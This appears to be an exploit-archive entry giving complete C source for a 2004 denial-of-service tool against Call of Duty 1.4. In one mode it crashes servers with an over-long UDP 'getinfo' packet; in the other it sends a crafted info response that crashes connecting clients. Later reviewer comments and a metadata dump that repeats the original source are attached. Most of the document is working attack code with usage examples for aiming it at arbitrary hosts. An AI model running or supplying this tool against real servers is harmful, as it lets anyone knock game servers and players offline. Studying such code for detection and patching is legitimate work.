ID 1337DAY-ID-5878 Type zdt Reporter Luigi Auriemma Modified 2004-09-05T00:00:00
Description
Exploit for unknown platform in category dos / poc
=============================================
Call of Duty <= 1.4 Denial of Service Exploit
=============================================
/* winerr.h */
/*
Header file used to manage errors in Windows
It supports socket and errno errors too
(this header replaces the previous sock_errX.h)
*/
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
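/*
 * Map a Winsock error code to its historic winerr.h description.
 *
 * code: value returned by WSAGetLastError().
 * Returns the message text for a known code, NULL otherwise. The texts are
 * the original ones so the program's output does not change.
 */
static const char *wsa_strerror(int code) {
	static const struct {
		int code;
		const char *text;
	} table[] = {
		{ 10004, "Interrupted system call" },
		{ 10009, "Bad file number" },
		{ 10013, "Permission denied" },
		{ 10014, "Bad address" },
		{ 10022, "Invalid argument (not bind)" },
		{ 10024, "Too many open files" },
		{ 10035, "Operation would block" },
		{ 10036, "Operation now in progress" },
		{ 10037, "Operation already in progress" },
		{ 10038, "Socket operation on non-socket" },
		{ 10039, "Destination address required" },
		{ 10040, "Message too long" },
		{ 10041, "Protocol wrong type for socket" },
		{ 10042, "Bad protocol option" },
		{ 10043, "Protocol not supported" },
		{ 10044, "Socket type not supported" },
		{ 10045, "Operation not supported on socket" },
		{ 10046, "Protocol family not supported" },
		{ 10047, "Address family not supported by protocol family" },
		{ 10048, "Address already in use" },
		{ 10049, "Can't assign requested address" },
		{ 10050, "Network is down" },
		{ 10051, "Network is unreachable" },
		{ 10052, "Net dropped connection or reset" },
		{ 10053, "Software caused connection abort" },
		{ 10054, "Connection reset by peer" },
		{ 10055, "No buffer space available" },
		{ 10056, "Socket is already connected" },
		{ 10057, "Socket is not connected" },
		{ 10058, "Can't send after socket shutdown" },
		{ 10059, "Too many references, can't splice" },
		{ 10060, "Connection timed out" },
		{ 10061, "Connection refused" },
		{ 10062, "Too many levels of symbolic links" },
		{ 10063, "File name too long" },
		{ 10064, "Host is down" },
		{ 10065, "No Route to Host" },
		{ 10066, "Directory not empty" },
		{ 10067, "Too many processes" },
		{ 10068, "Too many users" },
		{ 10069, "Disc Quota Exceeded" },
		{ 10070, "Stale NFS file handle" },
		{ 10091, "Network SubSystem is unavailable" },
		{ 10092, "WINSOCK DLL Version out of range" },
		{ 10093, "Successful WSASTARTUP not yet performed" },
		{ 10071, "Too many levels of remote in path" },
		{ 11001, "Host not found" },
		{ 11002, "Non-Authoritative Host not found" },
		{ 11003, "Non-Recoverable errors: FORMERR, REFUSED, NOTIMP" },
		{ 11004, "Valid name, no data record of requested type" },
	};

	for (size_t i = 0; i < sizeof table / sizeof table[0]; i++) {
		if (table[i].code == code) {
			return table[i].text;
		}
	}
	return NULL;
}

/*
 * Report the last Winsock failure on stderr and terminate with status 1.
 *
 * WSAGetLastError() is consulted first; a code that is not in the table above
 * falls back to strerror(errno), as the original switch's default did.
 * Requires <winsock.h> to have been included by the translation unit.
 * Never returns.
 *
 * Changes from the original: the message pointer is const-qualified (it only
 * ever points at string literals or strerror() storage) and the 50-case
 * switch is a lookup table, which keeps the data reviewable as data.
 */
void std_err(void) {
	const char *error = wsa_strerror(WSAGetLastError());

	if (error == NULL) {
		error = strerror(errno);
	}
	fprintf(stderr, "\nError: %s\n", error);
	exit(1);
}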
/* codboom.c */
/*
by Luigi Auriemma
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef WIN32
#include <winsock.h>
#include <io.h>
#include <malloc.h>
#include "winerr.h"
#define close closesocket
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#endif
#define VER "0.1"
#define BUFFSZ 2048
#define PORT 28960
#define TIMEOUT 3
#define INFO "\xff\xff\xff\xff" "getinfo xxx\n"
#define BOOM "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
// must be longer than 1023 bytes
#define SVBOF "\xff\xff\xff\xff" "getinfo %s\n"
#define CLBOF "\xff\xff\xff\xff" \
"%sResponse\n" \
"\\g_gametype\\dm" \
"\\gamename\\Call of Duty" \
"\\mapname\\mp_carentan" \
"\\protocol\\5" \
"\\scr_friendlyfire\\0" \
"\\scr_killcam\\0" \
"\\shortversion\\1.4" \
"\\sv_allowAnonymous\\0" \
"\\sv_floodProtect\\1" \
"\\sv_hostname\\Crash" \
"\\sv_maxclients\\26" \
"\\sv_maxPing\\0" \
"\\sv_maxRate\\10000" \
"\\sv_minPing\\0" \
"\\sv_privateClients\\0" \
"\\sv_punkbuster\\1" \
"\\sv_pure\\1" \
"\\pswrd\\0" \
"\\mod\\1" \
"\\crash\\%s"
void show_info(u_char *buff);
int timeout(int sock);
u_long resolv(char *host);
void std_err(void);
/*
 * Program entry point.
 *
 * argv[1] selects the mode:
 *   's' <host> [port]  - send a "getinfo" query (SVBOF) whose argument is the
 *                        1024-byte BOOM string to the given server and treat
 *                        the absence of a reply within TIMEOUT seconds as the
 *                        "vulnerable" verdict.
 *   'c' [port]         - bind a UDP socket on port (default PORT) and answer
 *                        every datagram with a CLBOF info/status response
 *                        whose final "crash" field carries BOOM.
 *
 * Returns 0 once the 's' path completes; the 'c' loop only ends through
 * std_err(). Every other failure path calls exit(1) or std_err().
 *
 * Reviewer notes (from the defending side):
 *  - The condition that matters on the wire is a UDP datagram to the game
 *    port beginning with "\xff\xff\xff\xffgetinfo " whose argument exceeds
 *    1023 bytes (see the comment next to BOOM); that prefix and length are
 *    what an ingress filter or IDS rule for this port can be keyed on.
 *    Whether a server really stopped answering is only inferred from the
 *    TIMEOUT below, so a "vulnerable" verdict can also be a lost packet.
 *  - buff is u_char[] but is handed to sprintf()/memcmp()/show_info() as
 *    char *; GCC accepts this with pointer-sign warnings.
 *  - psz is int where recvfrom() expects socklen_t; same size on the
 *    platforms this targeted, but not portable.
 *  - peer is never zeroed (sin_zero stays uninitialised) and the port from
 *    argv goes through atoi(), which yields 0 on garbage and silently
 *    truncates values above 65535 when stored in the u_short.
 */
int main(int argc, char *argv[]) {
int sd,
len,
psz,
on = 1,
type;
u_short port = PORT;
u_char buff[BUFFSZ + 1];   /* +1 so buff[len] can hold the terminator after a full BUFFSZ read */
struct sockaddr_in peer;
setbuf(stdout, NULL);   /* unbuffered stdout: progress lines appear immediately */
fputs("\n"
"Call of Duty <= 1.4 server/client shutdown "VER"\n"
"by Luigi Auriemma\n"
"e-mail: [email protected]\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 2) {
printf("\nUsage: %s <attack> [port(%d)]\n"
"\n"
"Attack:\n"
" c = broadcast clients shutdown\n"
" s = server shutdown\n"
" You must add the IP or the hostname of the server after the 's'.\n"
"\n"
"Some usage examples:\n"
" codboom c listens on port %d for clients\n"
" codboom c 1234 listens on port 1234\n"
" codboom s 192.168.0.1 tests the server 192.168.0.1 on port %d\n"
" codboom s codserver 1234 tests the server codserver on port 1234\n"
"\n", argv[0], PORT, PORT, PORT);
exit(1);
}
#ifdef WIN32
WSADATA wsadata;
/* return value not checked: a failed startup only surfaces later as a socket() error */
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
type = argv[1][0];   /* only the first character of the mode argument is inspected */
if(type == 's') {
if(argc < 3) {
printf("\n"
"Error: you must specify the server IP or hostname.\n"
" Example: %s s localhost\n"
"\n", argv[0]);
exit(1);
}
peer.sin_addr.s_addr = resolv(argv[2]);   /* resolv() exits on an unresolvable name */
if(argc > 3) port = atoi(argv[3]);
printf("\n- Target %s:%hu\n",
inet_ntoa(peer.sin_addr),
port);
} else if(type == 'c') {
peer.sin_addr.s_addr = INADDR_ANY;   /* 'c' mode listens on every local interface */
if(argc > 2) port = atoi(argv[2]);
printf("\n- Listen on port %d\n", port);
} else {
fputs("\n"
"Error: Wrong type of chosen attack.\n"
" You can choose between 2 types of attacks, passive versus clients with\n"
" 'c' or versus servers with 's'\n"
"\n", stdout);
exit(1);
}
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
psz = sizeof(peer);   /* in/out address length for the recvfrom() in the 'c' loop */
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
if(type == 's') {
fputs("- Request informations\n", stdout);
/* ordinary getinfo first: a reply shows the server is reachable before the test packet;
   sizeof(INFO) - 1 drops the literal's terminating NUL */
if(sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
if(timeout(sd) < 0) {
fputs("\n"
"Error: socket timeout, probably the server is not online or the port is wrong\n"
"\n", stdout);
exit(1);
}
len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);
if(len < 0) std_err();
buff[len] = 0x00;   /* show_info() needs a NUL-terminated string; len <= BUFFSZ so the index is in range */
show_info(buff);
fputs("- Send BOOM packet\n", stdout);
len = sprintf(buff, SVBOF, BOOM);   /* SVBOF plus the 1024-byte BOOM is about 1 KiB, well inside BUFFSZ */
if(sendto(sd, buff, len, 0, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
if(timeout(sd) < 0) {
/* no answer within TIMEOUT is reported as vulnerable; a dropped UDP datagram looks the same */
fputs("\nServer IS vulnerable!!!\n\n", stdout);
} else {
len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);
if(len < 0) std_err();
buff[len] = 0x00;
printf("\n"
"Server doesn't seem to be vulnerable, the following is the answer received:\n"
"\n%s\n\n", buff);
}
} else {
if(setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))
< 0) std_err();
if(bind(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
fputs(" Clients:\n", stdout);
for(;;) {   /* never terminates on its own */
/* peer is overwritten with the sender's address, which the sendto() below replies to */
len = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer, &psz);
if(len < 0) std_err();
buff[len] = 0x00;
/* buff comes from an arbitrary peer; the format string is fixed and buff is terminated, so the print is bounded */
printf("%16s:%hu -> %s\n",
inet_ntoa(peer.sin_addr),
ntohs(peer.sin_port),
buff);
/* skip the 4-byte 0xff prefix; a datagram shorter than 11 bytes makes this compare
   stale bytes past the terminator (still inside buff, so no out-of-bounds access) */
if(!memcmp(buff + 4, "getinfo", 7)) {
len = sprintf(buff, CLBOF, "info", BOOM);
} else {
len = sprintf(buff, CLBOF, "status", BOOM);
}
if(sendto(sd, buff, len, 0, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
}
}
close(sd);   /* closesocket() on WIN32 through the macro above */
return(0);
}
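/*
 * Print a backslash-separated infostring ("header\key\value\key\value...")
 * one pair per line.
 *
 * buff: NUL-terminated response as received from the server (main()
 *       writes the terminator at buff[len] before calling). The buffer is
 *       modified in place: every backslash is overwritten with a NUL.
 *
 * The text before the first backslash (the "...Response" header) is printed
 * on a line of its own; afterwards keys are right-aligned in 30 columns and
 * followed by their value. The final segment has no trailing separator and
 * is printed after the loop.
 *
 * Fix: the original passed a u_char * to strchr() and stored the char *
 * result back into a u_char *, which is an incompatible-pointer conversion
 * (a warning on older GCC, an error on recent ones). The work is now done
 * through a char * alias of the same buffer; behaviour is unchanged.
 */
void show_info(u_char *buff) {
	char *cursor = (char *)buff;
	char *sep;
	int expecting_key = 0;   /* the first segment is the header line, not a key */

	while ((sep = strchr(cursor, '\\')) != NULL) {
		*sep = '\0';
		if (expecting_key) {
			printf("%30s: ", cursor);
			expecting_key = 0;
		} else {
			printf("%s\n", cursor);
			expecting_key = 1;
		}
		cursor = sep + 1;
	}
	printf("%s\n", cursor);
}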
/*
 * Wait up to TIMEOUT seconds for sock to become readable.
 *
 * Returns 0 when data is waiting and -1 when the wait expired. A select()
 * failure is fatal: std_err() prints the cause and exits.
 *
 * NOTE(review): FD_SET() assumes sock < FD_SETSIZE; the program only ever
 * passes its single freshly created socket, so that holds here.
 */
int timeout(int sock) {
	fd_set readable;
	struct timeval limit = { .tv_sec = TIMEOUT, .tv_usec = 0 };
	int ready;

	FD_ZERO(&readable);
	FD_SET(sock, &readable);
	ready = select(sock + 1, &readable, NULL, NULL, &limit);
	if (ready < 0) {
		std_err();
	}
	return ready == 0 ? -1 : 0;
}
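/*
 * Resolve host (dotted quad or hostname) to an IPv4 address in network byte
 * order, widened to u_long so the caller can store it in sin_addr.s_addr.
 *
 * host: NUL-terminated address or name from the command line.
 * Returns the address; on an unresolvable name prints a message and exit(1).
 *
 * Notes:
 *  - inet_addr() signals failure with INADDR_NONE, which is also the encoding
 *    of 255.255.255.255, so that literal falls through to gethostbyname()
 *    (unchanged from the original).
 *  - Fix: the address is copied out of h_addr with memcpy(). The original
 *    dereferenced it as *(u_long *), reading sizeof(u_long) bytes from a
 *    4-byte IPv4 entry (an over-read on LP64 systems) through an aliasing
 *    pointer; the h_length check guards the copy against a short entry.
 */
u_long resolv(char *host) {
	in_addr_t addr = inet_addr(host);

	if (addr == INADDR_NONE) {
		struct hostent *hp = gethostbyname(host);
		if (hp == NULL || hp->h_addr == NULL || hp->h_length != (int)sizeof addr) {
			printf("\nError: Unable to resolv hostname (%s)\n", host);
			exit(1);
		}
		memcpy(&addr, hp->h_addr, sizeof addr);
	}
	return addr;
}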
#ifndef WIN32
/*
 * POSIX counterpart of the winerr.h std_err(): describe the last failing
 * call through errno and terminate with status 1. Never returns.
 */
void std_err(void) {
	static const char prefix[] = "\nError";   /* perror() appends ": <strerror(errno)>\n" */
	perror(prefix);
	exit(1);
}
#endif
{"published": "2004-09-05T00:00:00", "id": "1337DAY-ID-5878", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T02:14:26", "bulletin": {"published": "2004-09-05T00:00:00", "id": "1337DAY-ID-5878", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 6.5, "modified": "2016-04-20T02:14:26", "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P/"}}, "hash": "a1a0e209ab5cb76afc4e6cfa3a2dff1dba7dc7c7e95cf3476a792e3c18afd3cd", "description": "Exploit for unknown platform in category dos / poc", "type": "zdt", "lastseen": "2016-04-20T02:14:26", "edition": 1, "title": "Call of Duty <= 1.4 Denial of Service Exploit", "href": "http://0day.today/exploit/description/5878", "modified": "2004-09-05T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/5878", "references": [], "reporter": "Luigi Auriemma", "sourceData": "=============================================\r\nCall of Duty <= 1.4 Denial of Service Exploit\r\n=============================================\r\n\r\n\r\n/* winerr.h */\r\n\r\n/*\r\n Header file used for manage errors in Windows\r\n It support socket and errno too\r\n (this header replace the previous sock_errX.h)\r\n*/\r\n\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\n\r\n\r\nvoid std_err(void) {\r\n char *error;\r\n\r\n switch(WSAGetLastError()) {\r\n case 10004: error = \"Interrupted system call\"; break;\r\n case 10009: error = \"Bad file number\"; break;\r\n case 10013: error = \"Permission denied\"; break;\r\n case 10014: error = \"Bad address\"; break;\r\n case 10022: error = \"Invalid argument (not bind)\"; break;\r\n case 10024: error = \"Too many open files\"; break;\r\n case 10035: error = \"Operation would block\"; break;\r\n case 10036: error = \"Operation now in progress\"; break;\r\n case 10037: error = \"Operation already in progress\"; break;\r\n case 10038: 
error = \"Socket operation on non-socket\"; break;\r\n case 10039: error = \"Destination address required\"; break;\r\n case 10040: error = \"Message too long\"; break;\r\n case 10041: error = \"Protocol wrong type for socket\"; break;\r\n case 10042: error = \"Bad protocol option\"; break;\r\n case 10043: error = \"Protocol not supported\"; break;\r\n case 10044: error = \"Socket type not supported\"; break;\r\n case 10045: error = \"Operation not supported on socket\"; break;\r\n case 10046: error = \"Protocol family not supported\"; break;\r\n case 10047: error = \"Address family not supported by protocol family\"; break;\r\n case 10048: error = \"Address already in use\"; break;\r\n case 10049: error = \"Can't assign requested address\"; break;\r\n case 10050: error = \"Network is down\"; break;\r\n case 10051: error = \"Network is unreachable\"; break;\r\n case 10052: error = \"Net dropped connection or reset\"; break;\r\n case 10053: error = \"Software caused connection abort\"; break;\r\n case 10054: error = \"Connection reset by peer\"; break;\r\n case 10055: error = \"No buffer space available\"; break;\r\n case 10056: error = \"Socket is already connected\"; break;\r\n case 10057: error = \"Socket is not connected\"; break;\r\n case 10058: error = \"Can't send after socket shutdown\"; break;\r\n case 10059: error = \"Too many references, can't splice\"; break;\r\n case 10060: error = \"Connection timed out\"; break;\r\n case 10061: error = \"Connection refused\"; break;\r\n case 10062: error = \"Too many levels of symbolic links\"; break;\r\n case 10063: error = \"File name too long\"; break;\r\n case 10064: error = \"Host is down\"; break;\r\n case 10065: error = \"No Route to Host\"; break;\r\n case 10066: error = \"Directory not empty\"; break;\r\n case 10067: error = \"Too many processes\"; break;\r\n case 10068: error = \"Too many users\"; break;\r\n case 10069: error = \"Disc Quota Exceeded\"; break;\r\n case 10070: error = \"Stale NFS file 
handle\"; break;\r\n case 10091: error = \"Network SubSystem is unavailable\"; break;\r\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\r\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\r\n case 10071: error = \"Too many levels of remote in path\"; break;\r\n case 11001: error = \"Host not found\"; break;\r\n case 11002: error = \"Non-Authoritative Host not found\"; break;\r\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\r\n case 11004: error = \"Valid name, no data record of requested type\"; break;\r\n default: error = strerror(errno); break;\r\n }\r\n fprintf(stderr, \"\\nError: %s\\n\", error);\r\n exit(1);\r\n}\r\n\r\n/* codboom.c */\r\n\r\n/*\r\n\r\nby Luigi Auriemma\r\n\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n #include <io.h>\r\n #include <malloc.h>\r\n #include \"winerr.h\"\r\n\r\n #define close closesocket\r\n#else\r\n #include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <netdb.h>\r\n#endif\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define BUFFSZ 2048\r\n#define PORT 28960\r\n#define TIMEOUT 3\r\n#define INFO \"\\xff\\xff\\xff\\xff\" \"getinfo xxx\\n\"\r\n#define BOOM \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" 
\\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\"\r\n // must be major than 1023 bytes\r\n#define SVBOF \"\\xff\\xff\\xff\\xff\" \"getinfo %s\\n\"\r\n#define CLBOF \"\\xff\\xff\\xff\\xff\" \\\r\n \"%sResponse\\n\" \\\r\n \"\\\\g_gametype\\\\dm\" \\\r\n \"\\\\gamename\\\\Call of Duty\" \\\r\n \"\\\\mapname\\\\mp_carentan\" \\\r\n \"\\\\protocol\\\\5\" \\\r\n \"\\\\scr_friendlyfire\\\\0\" \\\r\n \"\\\\scr_killcam\\\\0\" \\\r\n \"\\\\shortversion\\\\1.4\" \\\r\n \"\\\\sv_allowAnonymous\\\\0\" \\\r\n \"\\\\sv_floodProtect\\\\1\" \\\r\n \"\\\\sv_hostname\\\\Crash\" \\\r\n \"\\\\sv_maxclients\\\\26\" \\\r\n \"\\\\sv_maxPing\\\\0\" \\\r\n \"\\\\sv_maxRate\\\\10000\" \\\r\n \"\\\\sv_minPing\\\\0\" \\\r\n \"\\\\sv_privateClients\\\\0\" \\\r\n \"\\\\sv_punkbuster\\\\1\" \\\r\n \"\\\\sv_pure\\\\1\" \\\r\n \"\\\\pswrd\\\\0\" \\\r\n \"\\\\mod\\\\1\" \\\r\n \"\\\\crash\\\\%s\"\r\n\r\n\r\n\r\nvoid show_info(u_char *buff);\r\nint timeout(int sock);\r\nu_long resolv(char *host);\r\nvoid std_err(void);\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n int sd,\r\n len,\r\n psz,\r\n on = 1,\r\n type;\r\n u_short port = PORT;\r\n u_char buff[BUFFSZ + 1];\r\n struct sockaddr_in peer;\r\n\r\n\r\n setbuf(stdout, NULL);\r\n\r\n fputs(\"\\n\"\r\n \"Call of Duty <= 1.4 server/client shutdown \"VER\"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: aluigi@altervista.org\\n\"\r\n \"web: http://aluigi.altervista.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 2) {\r\n printf(\"\\nUsage: %s <attack> [port(%d)]\\n\"\r\n 
\"\\n\"\r\n \"Attack:\\n\"\r\n \" c = broadcast clients shutdown\\n\"\r\n \" s = server shutdown\\n\"\r\n \" You must add the IP or the hostname of the server after the 's'.\\n\"\r\n \"\\n\"\r\n \"Some usage examples:\\n\"\r\n \" codboom c listens on port %d for clients\\n\"\r\n \" codboom c 1234 listens on port 1234\\n\"\r\n \" codboom s 192.168.0.1 tests the server 192.168.0.1 on port %d\\n\"\r\n \" codboom s codserver 1234 tests the server codserver on port 1234\\n\"\r\n \"\\n\", argv[0], PORT, PORT, PORT);\r\n exit(1);\r\n }\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif \r\n\r\n type = argv[1][0];\r\n if(type == 's') {\r\n if(argc < 3) {\r\n printf(\"\\n\"\r\n \"Error: you must specify the server IP or hostname.\\n\"\r\n \" Example: %s s localhost\\n\"\r\n \"\\n\", argv[0]);\r\n exit(1);\r\n }\r\n peer.sin_addr.s_addr = resolv(argv[2]);\r\n if(argc > 3) port = atoi(argv[3]);\r\n printf(\"\\n- Target %s:%hu\\n\",\r\n inet_ntoa(peer.sin_addr),\r\n port);\r\n\r\n } else if(type == 'c') {\r\n peer.sin_addr.s_addr = INADDR_ANY;\r\n if(argc > 2) port = atoi(argv[2]);\r\n printf(\"\\n- Listen on port %d\\n\", port);\r\n\r\n } else {\r\n fputs(\"\\n\"\r\n \"Error: Wrong type of chosen attack.\\n\"\r\n \" You can choose between 2 types of attacks, passive versus clients with\\n\"\r\n \" 'c' or versus servers with 's'\\n\"\r\n \"\\n\", stdout);\r\n exit(1);\r\n }\r\n\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n psz = sizeof(peer);\r\n\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd < 0) std_err();\r\n\r\n if(type == 's') {\r\n fputs(\"- Request informations\\n\", stdout);\r\n if(sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n if(timeout(sd) < 0) {\r\n fputs(\"\\n\"\r\n \"Error: socket timeout, probably the server is not online or the port is wrong\\n\"\r\n \"\\n\", stdout);\r\n exit(1);\r\n }\r\n len = recvfrom(sd, buff, BUFFSZ, 0, NULL, 
NULL);\r\n if(len < 0) std_err();\r\n buff[len] = 0x00;\r\n show_info(buff);\r\n\r\n fputs(\"- Send BOOM packet\\n\", stdout);\r\n len = sprintf(buff, SVBOF, BOOM);\r\n if(sendto(sd, buff, len, 0, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n\r\n if(timeout(sd) < 0) {\r\n fputs(\"\\nServer IS vulnerable!!!\\n\\n\", stdout);\r\n } else {\r\n len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);\r\n if(len < 0) std_err();\r\n buff[len] = 0x00;\r\n printf(\"\\n\"\r\n \"Server doesn't seem to be vulnerable, the following is the answer received:\\n\"\r\n \"\\n%s\\n\\n\", buff);\r\n }\r\n } else {\r\n if(setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))\r\n < 0) std_err();\r\n if(bind(sd, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n fputs(\" Clients:\\n\", stdout);\r\n for(;;) {\r\n len = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer, &psz);\r\n if(len < 0) std_err();\r\n buff[len] = 0x00;\r\n\r\n printf(\"%16s:%hu -> %s\\n\",\r\n inet_ntoa(peer.sin_addr),\r\n ntohs(peer.sin_port),\r\n buff);\r\n\r\n if(!memcmp(buff + 4, \"getinfo\", 7)) {\r\n len = sprintf(buff, CLBOF, \"info\", BOOM);\r\n } else {\r\n len = sprintf(buff, CLBOF, \"status\", BOOM);\r\n }\r\n if(sendto(sd, buff, len, 0, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n }\r\n }\r\n\r\n close(sd);\r\n return(0);\r\n}\r\n\r\n\r\n\r\n\r\n\r\nvoid show_info(u_char *buff) {\r\n int nt = 1;\r\n u_char *string;\r\n\r\n while((string = strchr(buff, '\\\\'))) {\r\n *string = 0x00;\r\n if(!nt) {\r\n printf(\"%30s: \", buff);\r\n nt++;\r\n } else {\r\n printf(\"%s\\n\", buff);\r\n nt = 0;\r\n }\r\n buff = string + 1;\r\n }\r\n printf(\"%s\\n\", buff);\r\n}\r\n\r\n\r\n\r\n\r\nint timeout(int sock) {\r\n struct timeval tout;\r\n fd_set fd_read;\r\n int err;\r\n\r\n tout.tv_sec = TIMEOUT;\r\n tout.tv_usec = 0;\r\n FD_ZERO(&fd_read);\r\n FD_SET(sock, &fd_read);\r\n err = select(sock + 1, &fd_read, NULL, NULL, &tout);\r\n if(err < 0) std_err();\r\n 
